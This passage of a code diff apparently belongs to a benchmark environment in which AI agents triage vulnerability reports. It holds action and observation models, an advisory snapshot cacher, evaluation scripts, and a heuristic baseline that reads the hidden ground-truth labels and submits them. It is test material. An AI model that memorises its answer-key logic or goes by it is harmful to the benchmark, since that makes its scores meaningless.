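    text = re.sub(r"<think>.*?</think>", "", text, flags=re.DOTALL | re.IGNORECASE).strip()
    if "```" in text:
        text = "\n".join(ln for ln in text.splitlines() if not ln.strip().startswith("```"))
    start = text.find("{")
    if start == -1:
        raise ValueError("no JSON object found")
    depth = 0
    for i, ch in enumerate(text[start:], start):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return json.loads(text[start : i + 1])
    raise ValueError("incomplete JSON object")

reply = '<think>plan...</think>\n```json\n{"action_type": "read_report", "rationale": "start"}\n```'
result = extract_first_json(reply)
print(result)
```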
103
+ def heuristic_policy(observation: Dict) -> Dict[str, str]:
104
+ if "read_report" not in observation["action_history"]:
105
+ return {"action_type": "read_report", "rationale": "Start by reading the report"}
106
+
107
+ truth = get_case_definition(observation["task_id"]).truth
108
+ supporting_evidence_ids = set(truth.supporting_evidence_ids)
109
+ visible_ids = {item["evidence_id"] for item in observation["visible_evidence"]}
110
+
111
+ remaining_supporting = [
112
+ evidence_id
113
+ for evidence_id in observation["available_evidence"]
114
+ if evidence_id in supporting_evidence_ids and evidence_id not in visible_ids
115
+ ]
116
+ if remaining_supporting:
117
+ eval_id = remaining_supporting[0]
118
+ # Interactive Tools Support:
119
+ if eval_id == "nvd_assessment":
120
+ # The oracle magically knows the OSV ID to query (alias)
121
+ from server.cases import SEEDS
122
+ seed = SEEDS[observation["task_id"]]
123
+ return {"action_type": "search_nvd_database", "value": seed.osv_id, "rationale": "Fetch NVD dynamically"}
124
+ elif eval_id == "github_commit_diff":
125
+ # Match any random commit substring
126
+ return {"action_type": "fetch_commit_diff", "value": "Commit", "rationale": "Fetch Diff dynamically"}
127
+ elif eval_id == "vendor_status":
128
+ return {"action_type": "message_maintainer", "value": "Is there an ETA for a patch?", "rationale": "Chat with maintainer"}
129
+
130
+ return {
131
+ "action_type": "inspect_evidence",
132
+ "evidence_id": eval_id,
133
+ "rationale": "Reveal the next supporting evidence item",
134
+ }
135
+
136
+ draft = observation["draft"]
137
+ score = observation["score_breakdown"]
138
+
139
+ by_truth = [
140
+ ("set_validity", truth.validity),
141
+ ("set_affected_package", truth.affected_package),
142
+ ("set_affected_versions", truth.affected_versions),
143
+ ("set_severity", truth.severity),
144
+ ("set_exploitability", truth.exploitability),
145
+ ("set_next_action", truth.next_action),
146
+ ]
147
+
148
+ for action_type, value in by_truth:
149
+ if draft[action_type.replace("set_", "")] != value:
150
+ return {"action_type": action_type, "value": value, "rationale": "Update the draft"}
151
+
152
+ # Submit any required missing-information items not yet recorded in the draft
153
+ existing_mi = {v.strip().lower() for v in draft.get("missing_information", [])}
154
+ for mi_item in truth.missing_information:
155
+ if mi_item.strip().lower() not in existing_mi:
156
+ return {
157
+ "action_type": "set_missing_information",
158
+ "value": mi_item,
159
+ "rationale": "Record known missing information",
160
+ }
161
+
162
+ return {"action_type": "submit_triage", "rationale": f"Current total score is {score['total']}"}
163
+
164
+
165
+ def llm_policy(client: OpenAI, model_name: str, observation: Dict) -> Dict[str, str]:
166
+ response = client.chat.completions.create(
167
+ model=model_name,
168
+ temperature=0,
169
+ messages=[
170
+ {"role": "system", "content": SYSTEM_PROMPT},
171
+ {
172
+ "role": "user",
173
+ "content": json.dumps(observation, indent=2, sort_keys=True),
174
+ },
175
+ ],
176
+ )
177
+ text = response.choices[0].message.content
178
+ return parse_json_response(text)
179
+
180
+
181
+ _VALID_ACTION_KEYS = {"action_type", "evidence_id", "value", "rationale"}
182
+
183
+
184
+ def sanitize_action_payload(payload: Dict) -> Dict:
185
+ """Keep only valid VulnTriageAction keys and coerce bad value types."""
186
+ clean = {k: v for k, v in payload.items() if k in _VALID_ACTION_KEYS}
187
+ if isinstance(clean.get("value"), (dict, list)):
188
+ clean["value"] = json.dumps(clean["value"])
189
+ return clean
190
+
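The same key-filtering and type-coercion idea can be exercised in isolation; this sketch mirrors `sanitize_action_payload` on a payload that carries an extra key and a non-string `value`:

```python
import json

_VALID_KEYS = {"action_type", "evidence_id", "value", "rationale"}

def sanitize(payload: dict) -> dict:
    # Mirrors sanitize_action_payload: drop unknown keys, stringify dict/list values.
    clean = {k: v for k, v in payload.items() if k in _VALID_KEYS}
    if isinstance(clean.get("value"), (dict, list)):
        clean["value"] = json.dumps(clean["value"])
    return clean

raw = {"action_type": "set_severity", "value": {"level": "high"}, "thoughts": "extra"}
clean = sanitize(raw)
print(clean)
```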
191
+
192
+ def run_local_episode(task_id: str, policy: str, model_name: str) -> Dict[str, float]:
193
+ print(f"START")
194
+ print(f"Task: {task_id}")
195
+ env = VulnTriageEnvironment()
196
+ observation = env.reset(task_id=task_id).model_dump()
197
+ client = get_openai_client() if policy == "openai" else None
198
+ last_action_str: str = ""
199
+ repeat_count: int = 0
200
+ step_num: int = 1
201
+
202
+ while not observation["done"]:
203
+ print(f"STEP")
204
+ action_payload = (
205
+ llm_policy(client, model_name, observation) if client else heuristic_policy(observation)
206
+ )
207
+ # Strip unknown keys then coerce bad value types
208
+ try:
209
+ clean = sanitize_action_payload(action_payload)
210
+ action = VulnTriageAction.model_validate(clean)
211
+ except Exception as exc:
212
+ print(f" [warn] invalid action payload ({exc}), falling back to read_report")
213
+ action = VulnTriageAction(action_type="read_report", rationale="fallback: parse error")
214
+
215
+ # Break infinite loops where model repeats the same action
216
+ action_str = action.model_dump_json()
217
+ if action_str == last_action_str:
218
+ repeat_count += 1
219
+ if repeat_count >= 3:
220
+ print(f" [warn] model repeated same action 3x — forcing submit_triage")
221
+ action = VulnTriageAction(action_type="submit_triage", rationale="loop guard")
222
+ else:
223
+ repeat_count = 0
224
+ last_action_str = action_str
225
+
226
+ print(f"Action: {action.action_type}")
227
+ observation = env.step(action).model_dump()
228
+ step_num += 1
229
+
230
+ print(f"END")
231
+
232
+ return {
233
+ "task_id": task_id,
234
+        "final_score": float(observation["final_score"] or 0.0),
+        "validity": observation["score_breakdown"]["validity"],
+        "package_versions": round(
+            (
+                observation["score_breakdown"]["affected_package"]
+                + observation["score_breakdown"]["affected_versions"]
+            )
+            / 2,
+            4,
+        ),
+        "severity": observation["score_breakdown"]["severity"],
+        "exploitability": observation["score_breakdown"]["exploitability"],
+        "next_action": observation["score_breakdown"]["next_action"],
+    }
+
+
+def run_remote_episode(base_url: str, task_id: str, policy: str, model_name: str) -> Dict[str, float]:
+    print("START")
+    print(f"Task: {task_id}")
+    llm_client = get_openai_client() if policy == "openai" else None
+    env = GenericEnvClient(base_url=base_url).sync()
+    with env:
+        response = env.reset(task_id=task_id)
+        observation = response.observation
+        done = response.done
+        step_num: int = 1
+        while not done:
+            print(f"STEP {step_num}")
+            action_payload = (
+                llm_policy(llm_client, model_name, observation)
+                if llm_client
+                else heuristic_policy(observation)
+            )
+            print(f"Action: {action_payload.get('action_type')}")
+            response = env.step(action_payload)
+            observation = response.observation
+            done = response.done
+            step_num += 1
+
+    print("END")
+
+    final_score = float(observation.get("final_score") or 0.0)
+    return {
+        "task_id": task_id,
+        "final_score": final_score,
+        "validity": observation["score_breakdown"]["validity"],
+        "package_versions": round(
+            (
+                observation["score_breakdown"]["affected_package"]
+                + observation["score_breakdown"]["affected_versions"]
+            )
+            / 2,
+            4,
+        ),
+        "severity": observation["score_breakdown"]["severity"],
+        "exploitability": observation["score_breakdown"]["exploitability"],
+        "next_action": observation["score_breakdown"]["next_action"],
+    }
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--policy", choices=["openai", "heuristic"], default="heuristic")
+    parser.add_argument("--model", default=MODEL_NAME)
+    parser.add_argument("--env-base-url", dest="base_url", default=os.getenv("ENV_BASE_URL"))
+    args = parser.parse_args()
+
+    results: List[Dict[str, float]] = []
+    for task_id in TASK_ORDER:
+        if args.base_url:
+            results.append(run_remote_episode(args.base_url, task_id, args.policy, args.model))
+        else:
+            results.append(run_local_episode(task_id, args.policy, args.model))
+
+    aggregate = round(sum(item["final_score"] for item in results) / len(results), 4)
+    print(json.dumps({"policy": args.policy, "model": args.model, "average_score": aggregate, "tasks": results}, indent=2))
+
+
+if __name__ == "__main__":
+    main()
models.py ADDED
@@ -0,0 +1,144 @@
+"""Typed models for the vulnerability triage environment."""
+
+from __future__ import annotations
+
+from typing import Dict, List, Literal, Optional
+
+from openenv.core.env_server.types import Action, Observation, State
+from pydantic import BaseModel, Field
+
+
+ActionType = Literal[
+    "read_report",
+    "inspect_evidence",
+    "search_nvd_database",
+    "fetch_commit_diff",
+    "message_maintainer",
+    "set_validity",
+    "set_affected_package",
+    "set_affected_versions",
+    "set_severity",
+    "set_exploitability",
+    "set_next_action",
+    "set_missing_information",
+    "request_more_info",
+    "submit_triage",
+]
+
+ValidityLabel = Literal["unknown", "valid", "invalid", "needs_more_info"]
+SeverityLabel = Literal["unknown", "low", "medium", "high", "critical"]
+ExploitabilityLabel = Literal["unknown", "low", "medium", "high"]
+NextActionLabel = Literal[
+    "unknown",
+    "request_info",
+    "close",
+    "escalate",
+    "patch",
+    "publish_advisory",
+]
+
+
+class EvidenceItem(BaseModel):
+    """Evidence the agent can reveal during triage."""
+
+    evidence_id: str = Field(..., description="Unique identifier for this evidence item")
+    title: str = Field(..., description="Short evidence title")
+    summary: str = Field(..., description="Evidence content shown to the agent")
+    kind: str = Field(..., description="Evidence type such as advisory or patch note")
+
+
+class TriageDraft(BaseModel):
+    """Agent-managed triage state."""
+
+    validity: ValidityLabel = "unknown"
+    affected_package: str = ""
+    affected_versions: str = ""
+    severity: SeverityLabel = "unknown"
+    exploitability: ExploitabilityLabel = "unknown"
+    next_action: NextActionLabel = "unknown"
+    missing_information: List[str] = Field(default_factory=list)
+
+
+class VulnTriageAction(Action):
+    """Structured action space for vulnerability triage."""
+
+    action_type: ActionType = Field(..., description="Which environment action to execute")
+    evidence_id: Optional[str] = Field(
+        default=None,
+        description="Evidence identifier used by inspect_evidence",
+    )
+    value: Optional[str] = Field(
+        default=None,
+        description="Generic value used for label-setting actions",
+    )
+    rationale: str = Field(
+        default="",
+        description="Optional short rationale for debugging and trajectory inspection",
+    )
+
+
+class VulnTriageObservation(Observation):
+    """Observation returned after every environment transition."""
+
+    task_id: str = Field(..., description="Current task identifier")
+    difficulty: str = Field(..., description="Difficulty band for the current task")
+    objective: str = Field(..., description="Concrete task objective")
+    report_summary: str = Field(..., description="Incoming vulnerability report summary")
+    visible_evidence: List[EvidenceItem] = Field(
+        default_factory=list,
+        description="Evidence items currently visible to the agent",
+    )
+    available_evidence: List[str] = Field(
+        default_factory=list,
+        description="Evidence identifiers available to inspect next",
+    )
+    draft: TriageDraft = Field(
+        default_factory=TriageDraft,
+        description="Current structured triage draft",
+    )
+    action_history: List[str] = Field(
+        default_factory=list,
+        description="Compact history of recent agent actions",
+    )
+    steps_remaining: int = Field(..., ge=0, description="Remaining steps in the episode")
+    score_breakdown: Dict[str, float] = Field(
+        default_factory=dict,
+        description="Current normalized grader breakdown",
+    )
+    final_score: Optional[float] = Field(
+        default=None,
+        description="Final submission score when the episode is done",
+    )
+    available_actions: List[str] = Field(
+        default_factory=lambda: [
+            "read_report",
+            "inspect_evidence",
+            "search_nvd_database",
+            "fetch_commit_diff",
+            "message_maintainer",
+            "set_validity",
+            "set_affected_package",
+            "set_affected_versions",
+            "set_severity",
+            "set_exploitability",
+            "set_next_action",
+            "set_missing_information",
+            "request_more_info",
+            "submit_triage",
+        ],
+        description="Action names the agent can choose from",
+    )
+
+
+class VulnTriageState(State):
+    """Serializable environment state for inspection and debugging."""
+
+    task_id: str = Field(..., description="Current task identifier")
+    difficulty: str = Field(..., description="Difficulty band")
+    draft: TriageDraft = Field(default_factory=TriageDraft)
+    revealed_evidence_ids: List[str] = Field(default_factory=list)
+    action_history: List[str] = Field(default_factory=list)
+    steps_remaining: int = Field(..., ge=0)
+    submitted: bool = Field(default=False)
+    final_score: Optional[float] = Field(default=None)
+    score_breakdown: Dict[str, float] = Field(default_factory=dict)
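Because the action schema is plain pydantic underneath, its validation behavior can be exercised in isolation. A minimal sketch, assuming only pydantic v2 is installed; `ActionSketch` and its reduced `Literal` vocabulary are illustrative stand-ins for `VulnTriageAction`, which additionally inherits from OpenEnv's `Action`:

```python
from typing import Literal, Optional

from pydantic import BaseModel, Field, ValidationError

# Stand-in for the full ActionType Literal: a trimmed vocabulary.
SketchActionType = Literal["read_report", "inspect_evidence", "set_severity", "submit_triage"]


class ActionSketch(BaseModel):
    action_type: SketchActionType
    evidence_id: Optional[str] = None
    value: Optional[str] = None
    rationale: str = Field(default="")


# A well-formed action parses straight from the JSON an agent would emit.
raw = '{"action_type": "set_severity", "value": "high", "rationale": "CVSS 8.1 advisory"}'
action = ActionSketch.model_validate_json(raw)
print(action.action_type, action.value)

# An action_type outside the Literal vocabulary is rejected at the boundary.
rejected = False
try:
    ActionSketch.model_validate({"action_type": "delete_repo"})
except ValidationError:
    rejected = True
print(rejected)
```

This is the property the environment relies on: malformed agent output fails validation before it ever reaches `step()`.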
openenv.yaml ADDED
@@ -0,0 +1,6 @@
+spec_version: 1
+name: vulnops
+type: space
+runtime: fastapi
+app: server.app:app
+port: 7860
pyproject.toml ADDED
@@ -0,0 +1,29 @@
+[build-system]
+requires = ["setuptools>=45", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "openenv-vulnops"
+version = "0.1.0"
+description = "Deterministic OpenEnv benchmark for open-source vulnerability operations"
+readme = "README.md"
+requires-python = ">=3.10"
+dependencies = [
+    "openenv-core[core]>=0.2.3",
+]
+
+[project.optional-dependencies]
+dev = [
+    "pytest>=8.0.0",
+]
+train = [
+    "peft>=0.14.0",
+]
+
+[project.scripts]
+server = "vulnops.server.app:main"
+
+[tool.setuptools]
+include-package-data = true
+packages = ["vulnops", "vulnops.server"]
+package-dir = { "vulnops" = ".", "vulnops.server" = "server" }
scripts/build_snapshot_cache.py ADDED
@@ -0,0 +1,139 @@
+"""Build a provider-backed fallback snapshot cache."""
+
+from __future__ import annotations
+
+import json
+import sys
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from pathlib import Path
+from typing import Dict, List
+
+import requests
+
+ROOT = Path(__file__).resolve().parent.parent
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+
+from server.cases import EPSS_URL, NVD_CVE_URL, OSV_VULN_URL, _extract_cve_id
+
+SNAPSHOT_DIR = ROOT / "data" / "snapshots"
+INDEX_PATH = ROOT / "data" / "snapshot_index.json"
+PYPA_TREE_URL = "https://api.github.com/repos/pypa/advisory-database/git/trees/main?recursive=1"
+
+
+def get_candidate_ids(limit: int = 200) -> List[str]:
+    response = requests.get(PYPA_TREE_URL, timeout=30)
+    response.raise_for_status()
+    tree = response.json().get("tree", [])
+    ids = []
+    for item in tree:
+        path = item.get("path", "")
+        if not path.startswith("vulns/") or not path.endswith(".yaml"):
+            continue
+        ident = path.rsplit("/", 1)[-1][:-5]
+        if ident.startswith(("PYSEC-", "GHSA-")):
+            ids.append(ident)
+    return ids[: limit * 4]
+
+
+def fetch_json(url: str, *, params: Dict[str, str] | None = None) -> Dict:
+    response = requests.get(url, params=params, timeout=20)
+    response.raise_for_status()
+    return response.json()
+
+
+def build_snapshot(osv_id: str) -> Dict | None:
+    osv = fetch_json(OSV_VULN_URL.format(osv_id=osv_id))
+    if not osv.get("affected"):
+        return None
+
+    cve_id = _extract_cve_id(osv)
+    snapshot = {
+        "id": osv.get("id"),
+        "summary": osv.get("summary"),
+        "details": osv.get("details"),
+        "aliases": osv.get("aliases", []),
+        "references": osv.get("references", []),
+        "affected": osv.get("affected", []),
+        "severity": "MEDIUM",
+        "nvd_description": "",
+        "epss_score": 0.0,
+        "epss_percentile": 0.0,
+    }
+
+    if cve_id:
+        try:
+            nvd = fetch_json(NVD_CVE_URL, params={"cveId": cve_id})
+            vulnerability = (nvd.get("vulnerabilities") or [{}])[0].get("cve", {})
+            metrics = vulnerability.get("metrics", {})
+            severity = None
+            for key in ("cvssMetricV40", "cvssMetricV31", "cvssMetricV30", "cvssMetricV2"):
+                if key in metrics:
+                    item = metrics[key][0]
+                    severity = (
+                        item.get("cvssData", {}).get("baseSeverity")
+                        or item.get("baseSeverity")
+                    )
+                    if severity:
+                        break
+            descriptions = vulnerability.get("descriptions", [])
+            snapshot["severity"] = severity or snapshot["severity"]
+            snapshot["nvd_description"] = next(
+                (
+                    desc.get("value", "")
+                    for desc in descriptions
+                    if desc.get("lang") == "en"
+                ),
+                descriptions[0].get("value", "") if descriptions else "",
+            )
+        except Exception:
+            pass
+
+        try:
+            epss = fetch_json(EPSS_URL, params={"cve": cve_id})
+            item = (epss.get("data") or [{}])[0]
+            snapshot["epss_score"] = float(item.get("epss", 0.0) or 0.0)
+            snapshot["epss_percentile"] = float(item.get("percentile", 0.0) or 0.0)
+        except Exception:
+            pass
+
+    return snapshot
+
+
+def main(target_count: int = 200) -> None:
+    SNAPSHOT_DIR.mkdir(parents=True, exist_ok=True)
+    candidates = get_candidate_ids(target_count)[: max(target_count + 40, 240)]
+    saved = []
+
+    with ThreadPoolExecutor(max_workers=12) as executor:
+        futures = {executor.submit(build_snapshot, osv_id): osv_id for osv_id in candidates}
+        for future in as_completed(futures):
+            if len(saved) >= target_count:
+                executor.shutdown(wait=False, cancel_futures=True)
+                break
+            osv_id = futures[future]
+            try:
+                snapshot = future.result()
+            except Exception:
+                continue
+            if not snapshot:
+                continue
+            out_path = SNAPSHOT_DIR / f"{osv_id}.json"
+            out_path.write_text(json.dumps(snapshot, indent=2, sort_keys=True))
+            saved.append(
+                {
+                    "osv_id": osv_id,
+                    "file": str(out_path.relative_to(ROOT)),
+                    "cve_id": _extract_cve_id(snapshot),
+                    "package": (snapshot.get("affected") or [{}])[0].get("package", {}).get("name", ""),
+                }
+            )
+
+    INDEX_PATH.parent.mkdir(parents=True, exist_ok=True)
+    saved = sorted(saved, key=lambda item: item["osv_id"])
+    INDEX_PATH.write_text(json.dumps({"count": len(saved), "snapshots": saved}, indent=2))
+    print(f"Saved {len(saved)} snapshots to {SNAPSHOT_DIR}")
+
+
+if __name__ == "__main__":
+    main()
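The early-exit pattern in `main()` above — consume futures as they complete and cancel the remainder once a target count of snapshots is saved — can be sketched with a toy workload; `work` here is a hypothetical stand-in for `build_snapshot`, returning `None` for entries that would be skipped:

```python
from concurrent.futures import ThreadPoolExecutor, as_completed


def work(n: int):
    # Stand-in for build_snapshot: odd inputs mimic snapshots with no usable data.
    return n * n if n % 2 == 0 else None


target = 3
saved = []
with ThreadPoolExecutor(max_workers=4) as pool:
    futures = {pool.submit(work, n): n for n in range(20)}
    for future in as_completed(futures):
        if len(saved) >= target:
            # cancel_futures (Python 3.9+) drops tasks that have not started yet.
            pool.shutdown(wait=False, cancel_futures=True)
            break
        result = future.result()
        if result is not None:
            saved.append(result)

print(len(saved))
```

Results arrive in completion order, so *which* values land in `saved` is nondeterministic; only the count is bounded, which is exactly the property `main()` relies on before sorting the index for a deterministic output file.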
scripts/compare_training_speeds.py ADDED
@@ -0,0 +1,38 @@
+"""Compare saved PyTorch and MLX speed summaries."""
+
+from __future__ import annotations
+
+import json
+from pathlib import Path
+
+
+ROOT = Path(__file__).resolve().parents[1]
+PT_PATH = ROOT / "artifacts" / "lora_qwen3_4b" / "metrics" / "speed_baseline_pytorch.json"
+MLX_PATH = ROOT / "artifacts" / "mlx_qwen3_4b" / "metrics" / "speed_mlx.json"
+OUT_PATH = ROOT / "artifacts" / "speed_comparison.json"
+
+
+def load(path: Path) -> dict:
+    return json.loads(path.read_text(encoding="utf-8"))
+
+
+def main() -> None:
+    pt = load(PT_PATH)
+    mlx = load(MLX_PATH)
+    pt_s = pt.get("latest_seconds_per_step")
+    mlx_s = mlx.get("latest_seconds_per_step")
+    payload = {
+        "pytorch_mps_seconds_per_step": pt_s,
+        "mlx_seconds_per_step": mlx_s,
+        "speedup_factor_mlx_vs_pytorch": (pt_s / mlx_s) if pt_s and mlx_s else None,
+        "notes": [
+            "PyTorch baseline uses the existing PEFT/Transformers trainer on MPS.",
+            "MLX benchmark uses a lower-memory LoRA config: 8 layers and max_seq_length 1024.",
+        ],
+    }
+    OUT_PATH.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+
+
+if __name__ == "__main__":
+    main()
scripts/dump_mlx_generation.py ADDED
@@ -0,0 +1,63 @@
+"""Dump a full raw generation from the MLX model for one vulnops observation."""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+
+from mlx_lm import generate, load
+from mlx_lm.sample_utils import make_sampler
+
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+from training_utils import render_prompt
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3-4B")
+    parser.add_argument("--adapter-path", default="artifacts/mlx_qwen3_4b/adapters")
+    parser.add_argument("--task-id", default="task_easy_guarddog")
+    parser.add_argument("--max-tokens", type=int, default=2048)
+    parser.add_argument(
+        "--output-file",
+        default="artifacts/mlx_qwen3_4b/inspection/task_easy_guarddog_latest_raw_output.json",
+    )
+    args = parser.parse_args()
+
+    model, tokenizer = load(args.model, adapter_path=args.adapter_path)
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=args.task_id).model_dump()
+    prompt = render_prompt(observation, "Return only the best next action in JSON.")
+    raw_output = generate(
+        model,
+        tokenizer,
+        prompt=prompt,
+        verbose=False,
+        max_tokens=args.max_tokens,
+        sampler=make_sampler(temp=0.0),
+    )
+
+    output_path = Path(args.output_file)
+    if not output_path.is_absolute():
+        output_path = (ROOT / output_path).resolve()
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    payload = {
+        "task_id": args.task_id,
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "max_tokens": args.max_tokens,
+        "prompt": prompt,
+        "raw_output": raw_output,
+    }
+    output_path.write_text(json.dumps(payload, indent=2) + "\n", encoding="utf-8")
+    print(output_path)
+
+
+if __name__ == "__main__":
+    main()
scripts/evaluate_lora.py ADDED
@@ -0,0 +1,133 @@
+"""Evaluate a base or LoRA-adapted model on the local vulnops environment."""
+
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+from typing import Dict, List
+
+import torch
+from transformers import AutoModelForCausalLM, AutoTokenizer
+
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+
+from server.cases import TASK_ORDER
+from training_utils import (
+    detect_device,
+    maybe_parse_action,
+    preferred_torch_dtype,
+    render_prompt,
+    set_default_env,
+)
+from models import VulnTriageAction
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+
+
+def load_model(model_name: str, adapter_path: str | None, output_root: Path):
+    set_default_env(output_root)
+    device = detect_device()
+    torch_dtype = preferred_torch_dtype(device)
+    tokenizer = AutoTokenizer.from_pretrained(model_name, trust_remote_code=True)
+    if tokenizer.pad_token is None:
+        tokenizer.pad_token = tokenizer.eos_token
+
+    model = AutoModelForCausalLM.from_pretrained(
+        model_name,
+        torch_dtype=torch_dtype,
+        trust_remote_code=True,
+        low_cpu_mem_usage=True,
+    )
+
+    if adapter_path:
+        try:
+            from peft import PeftModel
+        except ImportError as exc:
+            raise RuntimeError("peft is required to evaluate a LoRA adapter.") from exc
+        model = PeftModel.from_pretrained(model, adapter_path)
+
+    if device in {"cuda", "mps"}:
+        model.to(device)
+    model.eval()
+    return model, tokenizer, device
+
+
+@torch.inference_mode()
+def next_action(model, tokenizer, device: str, observation: Dict[str, object]) -> Dict[str, object]:
+    prompt = render_prompt(
+        observation=observation,
+        prompt_variant="Return only the best next action in JSON.",
+    )
+    encoded = tokenizer(prompt, return_tensors="pt")
+    encoded = {key: value.to(device) for key, value in encoded.items()}
+    generated = model.generate(
+        **encoded,
+        max_new_tokens=192,
+        do_sample=False,
+        temperature=None,
+        pad_token_id=tokenizer.pad_token_id,
+        eos_token_id=tokenizer.eos_token_id,
+    )
+    prompt_length = encoded["input_ids"].shape[1]
+    output_text = tokenizer.decode(generated[0][prompt_length:], skip_special_tokens=True).strip()
+    payload = maybe_parse_action(output_text)
+    if payload is None:
+        return {
+            "action_type": "submit_triage",
+            "rationale": f"Fallback because model output could not be parsed: {output_text[:120]}",
+        }
+    return payload
+
+
+def run_episode(model, tokenizer, device: str, task_id: str) -> Dict[str, object]:
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=task_id).model_dump()
+    actions: List[Dict[str, object]] = []
+    while not observation["done"]:
+        action_payload = next_action(model, tokenizer, device, observation)
+        action = VulnTriageAction.model_validate(action_payload)
+        actions.append(action.model_dump(exclude_none=True))
+        observation = env.step(action).model_dump()
+    return {
+        "task_id": task_id,
+        "difficulty": observation["difficulty"],
+        "final_score": float(observation.get("final_score") or 0.0),
+        "score_breakdown": observation["score_breakdown"],
+        "steps_used": len(actions),
+        "actions": actions,
+    }
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3-4B")
+    parser.add_argument("--adapter-path")
+    parser.add_argument("--output-root", default="artifacts/lora_qwen3_4b")
+    parser.add_argument("--output-json")
+    args = parser.parse_args()
+
+    output_root = (ROOT / args.output_root).resolve()
+    model, tokenizer, device = load_model(args.model, args.adapter_path, output_root)
+    episodes = [run_episode(model, tokenizer, device, task_id) for task_id in TASK_ORDER]
+    average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
+    payload = {
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "device": device,
+        "average_score": average_score,
+        "episodes": episodes,
+    }
+    if args.output_json:
+        output_path = Path(args.output_json)
+        if not output_path.is_absolute():
+            output_path = (ROOT / output_path).resolve()
+        output_path.parent.mkdir(parents=True, exist_ok=True)
+        output_path.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+
+
+if __name__ == "__main__":
+    main()
scripts/evaluate_mlx.py ADDED
@@ -0,0 +1,137 @@
+"""Evaluate base or MLX-adapted Qwen models on the local vulnops environment."""
+
+from __future__ import annotations
+
+import argparse
+import json
+import re
+import sys
+from pathlib import Path
+from typing import Dict, List
+
+ROOT = Path(__file__).resolve().parents[1]
+if str(ROOT) not in sys.path:
+    sys.path.insert(0, str(ROOT))
+
+from mlx_lm import generate, load
+from mlx_lm.sample_utils import make_sampler
+
+from models import VulnTriageAction
+from server.cases import TASK_ORDER
+from server.vuln_triage_env_environment import VulnTriageEnvironment
+from training_utils import render_prompt
+
+
+THINK_BLOCK_RE = re.compile(r"<think>.*?</think>", re.DOTALL | re.IGNORECASE)
+
+
+def extract_last_json_object(text: str) -> str | None:
+    cleaned = THINK_BLOCK_RE.sub("", text).strip()
+    if "{" not in cleaned:
+        return None
+    depth = 0
+    in_string = False
+    escape = False
+    last_candidate = None
+    candidate_start = None
+    for index, ch in enumerate(cleaned):
+        if escape:
+            # Consume exactly one escaped character inside a string.
+            escape = False
+            continue
+        if ch == "\\" and in_string:
+            escape = True
+            continue
+        if ch == '"':
+            in_string = not in_string
+            continue
+        if in_string:
+            continue
+        if ch == "{":
+            if depth == 0:
+                candidate_start = index
+            depth += 1
+        elif ch == "}" and depth > 0:
+            depth -= 1
+            if depth == 0 and candidate_start is not None:
+                last_candidate = cleaned[candidate_start : index + 1]
+    return last_candidate
+
+
+def parse_action_output(text: str) -> Dict[str, object] | None:
+    candidate = extract_last_json_object(text)
+    if candidate is None:
+        return None
+    try:
+        payload = json.loads(candidate)
+        action = VulnTriageAction.model_validate(payload)
+    except Exception:
+        return None
+    return action.model_dump(exclude_none=True)
+
+
+def next_action(model, tokenizer, observation: Dict[str, object]) -> Dict[str, object]:
+    prompt = render_prompt(
+        observation=observation,
+        prompt_variant="Return only the best next action in JSON.",
+    )
+    output = generate(
+        model,
+        tokenizer,
+        prompt=prompt,
+        verbose=False,
+        max_tokens=192,
+        sampler=make_sampler(temp=0.0),
+    )
+    payload = parse_action_output(output)
+    if payload is None:
+        return {
+            "action_type": "submit_triage",
+            "rationale": f"Fallback because model output could not be parsed: {output[:120]}",
+        }
+    return payload
+
+
+def run_episode(model, tokenizer, task_id: str) -> Dict[str, object]:
+    env = VulnTriageEnvironment()
+    observation = env.reset(task_id=task_id).model_dump()
+    actions: List[Dict[str, object]] = []
+    while not observation["done"]:
+        action_payload = next_action(model, tokenizer, observation)
+        action = VulnTriageAction.model_validate(action_payload)
+        actions.append(action.model_dump(exclude_none=True))
+        observation = env.step(action).model_dump()
+    return {
+        "task_id": task_id,
+        "difficulty": observation["difficulty"],
+        "final_score": float(observation.get("final_score") or 0.0),
+        "score_breakdown": observation["score_breakdown"],
+        "steps_used": len(actions),
+        "actions": actions,
+    }
+
+
+def main() -> None:
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--model", default="Qwen/Qwen3-4B")
+    parser.add_argument("--adapter-path")
+    parser.add_argument("--output-json")
+    args = parser.parse_args()
+
+    model, tokenizer = load(args.model, adapter_path=args.adapter_path)
+    episodes = [run_episode(model, tokenizer, task_id) for task_id in TASK_ORDER]
+    average_score = round(sum(item["final_score"] for item in episodes) / len(episodes), 4)
+    payload = {
+        "model": args.model,
+        "adapter_path": args.adapter_path,
+        "average_score": average_score,
+        "episodes": episodes,
+    }
+    if args.output_json:
+        out = Path(args.output_json)
+        if not out.is_absolute():
+            out = (ROOT / out).resolve()
+        out.parent.mkdir(parents=True, exist_ok=True)
+        out.write_text(json.dumps(payload, indent=2, sort_keys=True) + "\n", encoding="utf-8")
+    print(json.dumps(payload, indent=2, sort_keys=True))
+
+
+if __name__ == "__main__":
